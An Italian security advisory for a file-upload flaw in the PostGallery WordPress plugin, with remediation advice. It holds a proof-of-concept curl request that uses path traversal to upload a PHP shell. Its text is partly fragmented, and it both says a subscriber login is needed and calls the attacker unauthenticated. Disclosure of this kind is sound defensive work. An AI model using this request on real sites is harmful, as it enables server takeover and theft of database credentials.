
Divulgazione per CVE-2025-13543
Divulgazione per CVE-2025-13543
Questo repository divulga una vulnerabilità scoperta in PostGallery <= 1.12.5, plugin WordPress sviluppato da rtowebsites.
| ID CVE | Tipo | Componente | Impatto |
|---|---|---|---|
| CVE-2025-13543 | Caricamento Arbitrario di File Autenticato (Subscriber+) | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | Un utente malintenzionato non autenticato può caricare file arbitrari |
postgalleryAjaxUpload) e backend PostGalleryUploadercurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php e delle credenziali del database, l'implementazione di backdoor persistenti e la creazione di account amministratore rogue.lib/ajax-actions/imageUpload.php, applicare un'autorizzazione adeguata (ad esempio, richiedere current_user_can('upload_files')) e convalidare un nonce crittografico prima di elaborare gli upload.admin/PostGalleryUploader.php, vincolare strettamente uploadFolder a una sottodirectory nota di wp-content/uploads/gallery, rifiutare qualsiasi valore contenente ../ o percorsi assoluti, e normalizzare i percorsi prima dell'uso.wp_handle_upload() / wp_check_filetype_and_ext() e limitare gli upload a una whitelist di tipi di file non eseguibili, bloccando esplicitamente .php e altre estensioni eseguibili in directory accessibili dal web.Non avrei mai pensato che potesse esistere una vulnerabilità simile a una CTF... Un semplice caricamento arbitrario di file sarebbe già grave, ma con l'aggiunta di un directory traversal è la disperazione. Riprodurre la vulnerabilità è stato molto divertente.
Nome: MooseLove
Ruolo: Ricercatore di sicurezza indipendente / bug hunter
Contatto: Disponibile su richiesta
Questa segnalazione è fornita per sensibilizzare sulla sicurezza pubblica. Liberamente condivisibile con attribuzione.